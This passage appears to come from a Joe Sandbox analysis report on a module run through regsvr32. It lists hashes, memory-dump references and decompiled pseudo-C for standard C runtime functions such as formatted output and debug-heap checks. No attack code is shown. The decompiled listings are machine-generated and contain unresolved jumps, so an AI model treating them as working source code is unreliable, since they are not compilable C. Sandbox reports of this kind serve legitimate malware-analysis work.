                                                                                        • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                                                        • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                                                        • API String ID: 1608253119-1427866139
                                                                                        • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                        • Instruction ID: af7a509f9d9663d3d091774dda128b819ecaca6506a1d0d194354ddf51f74ba4
                                                                                        • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                        • Instruction Fuzzy Hash: 0F41573191DB4686E7A09B20F84436E72E0F786780F614135E6CD43AF8CBBEE485CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                                                        • API String ID: 2123368286-2958264153
                                                                                        • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                        • Instruction ID: 82e3240dde4e8d48ae566a9cb8a6505450234aa7e72eaba3f84792f0d3cada8d
                                                                                        • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                        • Instruction Fuzzy Hash: 3CE14D31A1DA868AEBB48B24E84076EB3E0F385765F204225E6DD43BE5DB7ED445CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 1967237116-569934968
                                                                                        • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                        • Instruction ID: 28cad1f176e9be3240a3a6eae7be917d28bff7715537f6893ff636485155e31a
                                                                                        • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                        • Instruction Fuzzy Hash: 4AD11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                                                                        
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}



                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: wctomb_s
                                                                                        • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2215178078-1895985292
                                                                                        • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                        • Instruction ID: 997c34190204a200d34649c4b27f82da9c53e16be2ae3c50a0a3632b50fb2b35
                                                                                        • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                        • Instruction Fuzzy Hash: E5B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F604126DAD887AA9DB7DD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                                                        • API String ID: 2123368286-348877268
                                                                                        • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                        • Instruction ID: 912ac3d754b702bf63931d64d46681ea7dc30ff1a731304ef262a69894a36d33
                                                                                        • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                        • Instruction Fuzzy Hash: 60913A32A0DA4286E7A08B68E84476E77E0F394365F204625E7DD43AF8DB7EE5458F01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-4087627024
                                                                                        • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                        • Instruction ID: 0390e2d988dd4d1b4c77dc3c399ba89b4ed25e2388807167c80bf5b266a398b6
                                                                                        • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                        • Instruction Fuzzy Hash: 95713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED540CF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                                                        • API String ID: 2123368286-3692278645
                                                                                        • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                        • Instruction ID: a0804de238eaeeb3fb2e5788e9c0a34a411087d46cc23648724fab17a52a0f2c
                                                                                        • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                        • Instruction Fuzzy Hash: 0E513C31A1C68686F7A0CB24E8447BE76E5F384344F604136E6CD47AB8DBBEE544CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free_base_malloc_base
                                                                                        • String ID:
                                                                                        • API String ID: 3824334587-0
                                                                                        • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                        • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                                                                        • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                        • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                                                        • API String ID: 2123368286-817335350
                                                                                        • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                        • Instruction ID: bdf1888ae082cb337f1151e8154f2efa45ef3de29dcf6e6b26155e3a2b634fb1
                                                                                        • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                        • Instruction Fuzzy Hash: 6461FB36A18B4586EB64CB19E89132E77A0F785794F714126EBCD83BB4CB3ED451CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                                                                        				intOrPtr _v24;
                                                                                        				long long _v48;
                                                                                        				long long _v64;
                                                                                        				intOrPtr _t21;
                                                                                        
                                                                                        				_a8 = _t21;
                                                                                        				_v48 = 0;
                                                                                        				_v64 = 0;
                                                                                        				_v24 = _a8;
                                                                                        				_v24 = _v24 - 2;
                                                                                        				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                                                                        				goto __rax;
                                                                                        			}







                                                                                        0x7fef9d2cff0
                                                                                        0x7fef9d2cff8
                                                                                        0x7fef9d2d000
                                                                                        0x7fef9d2d010
                                                                                        0x7fef9d2d01b
                                                                                        0x7fef9d2d024
                                                                                        0x7fef9d2d048

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                                                        • API String ID: 2123368286-2245755083
                                                                                        • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                        • Instruction ID: 19b7c93d4736ed7bda32945b1fb5f0ab86c56f1dc684690d029957412a3b2f1f
                                                                                        • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                        • Instruction Fuzzy Hash: 8C71E83291C786CAE7A09F58E84476EB7E0F785754F214135E6CA47BA4CB3EE448CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapPointerValid
                                                                                        • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                                                        • API String ID: 299318057-1988567080
                                                                                        • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                        • Instruction ID: 366f9875c4733d956d5456637ee1c03ed06e45eb4220731ed3e90847f50651e0
                                                                                        • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                        • Instruction Fuzzy Hash: FB314D36A1874A86EBE48B59E84172E67D1F785784F614036EACD83BB4DB3FD440CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer$_realloc_dbg
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                                                        • API String ID: 429494535-1858280179
                                                                                        • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                        • Instruction ID: 6b22acafcb165364cee05dc597c268ac6a46098997f00e2a063c2d8cfde95e66
                                                                                        • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                        • Instruction Fuzzy Hash: D441B836619B8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 1967237116-734865713
                                                                                        • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                        • Instruction ID: ca3ec57313c22d844cddba0ccc7478434e3ff2f5ac626f229199dffed11d05c2
                                                                                        • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                        • Instruction Fuzzy Hash: 83D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6DD87AA9DB7DE440CF14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                                                                        
                                                                                        				_a1412 = _a1208 & 0x0000ffff;
                                                                                        				_a1412 = _a1412 - 0x41;
                                                                                        				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                                        				goto __rax;
                                                                                        			}



                                                                                        0x7fef9d3df95
                                                                                        0x7fef9d3dfa6
                                                                                        0x7fef9d3dfb5
                                                                                        0x7fef9d3dfdc

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 0-1585035072
                                                                                        • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                        • Instruction ID: 7092a431cc2f14586a5b6039053772aca43f1c1a92c9fb0ada713ca2b75f96be
                                                                                        • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                        • Instruction Fuzzy Hash: 93B10D7260CAC286E7B1DB55E8417AFB7E0F784356F104026EAC987AA9DB7DE444CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                                                        • API String ID: 2123368286-1876092940
                                                                                        • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                        • Instruction ID: 5b23c079d1b4d794af0cdd69ad2b30100ea5e3abf5a9ef6833dde17c78c07454
                                                                                        • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                        • Instruction Fuzzy Hash: 40911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                                                        
                                                                                        				_a972 = _a696 & 0x000000ff;
                                                                                        				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                                        				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                                        				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                                        				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                                        				_a1096 = _a1096 + 1;
                                                                                        				asm("bts eax, 0xc");
                                                                                        				goto 0xf9d3beb2;
                                                                                        				_a80 = _a80 | 0x00000010;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                                        				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                                        				_a1096 = _a1096 + 2;
                                                                                        				asm("btr eax, 0xf");
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                                        				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                                        				goto 0xf9d3bfbe;
                                                                                        				_a704 = 0;
                                                                                        				goto E000007FE7FEF9D3BB66;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				_a80 = _a80 | 0x00000020;
                                                                                        				goto 0xf9d3bfd9;
                                                                                        				asm("bts eax, 0xb");
                                                                                        				_a976 = _a696;
                                                                                        				_a976 = _a976 - 0x41;
                                                                                        				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                                        				goto __rax;
                                                                                        			}



                                                                                        0x7fef9d3be3a
                                                                                        0x7fef9d3be49
                                                                                        0x7fef9d3be53
                                                                                        0x7fef9d3be61
                                                                                        0x7fef9d3be6b
                                                                                        0x7fef9d3be71
                                                                                        0x7fef9d3be84
                                                                                        0x7fef9d3be91
                                                                                        0x7fef9d3be9d
                                                                                        0x7fef9d3bea5
                                                                                        0x7fef9d3beae
                                                                                        0x7fef9d3beb2
                                                                                        0x7fef9d3bebb
                                                                                        0x7fef9d3bed1
                                                                                        0x7fef9d3bee2
                                                                                        0x7fef9d3bef0
                                                                                        0x7fef9d3befc
                                                                                        0x7fef9d3bf04
                                                                                        0x7fef9d3bf17
                                                                                        0x7fef9d3bf28
                                                                                        0x7fef9d3bf36
                                                                                        0x7fef9d3bf42
                                                                                        0x7fef9d3bf4a
                                                                                        0x7fef9d3bf5a
                                                                                        0x7fef9d3bf6a
                                                                                        0x7fef9d3bf7a
                                                                                        0x7fef9d3bf8a
                                                                                        0x7fef9d3bf9a
                                                                                        0x7fef9d3bfaa
                                                                                        0x7fef9d3bfac
                                                                                        0x7fef9d3bfae
                                                                                        0x7fef9d3bfb9
                                                                                        0x7fef9d3bfbe
                                                                                        0x7fef9d3bfc7
                                                                                        0x7fef9d3bfcb
                                                                                        0x7fef9d3bfd1
                                                                                        0x7fef9d3bfe6
                                                                                        0x7fef9d3bff7
                                                                                        0x7fef9d3c006
                                                                                        0x7fef9d3c02d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
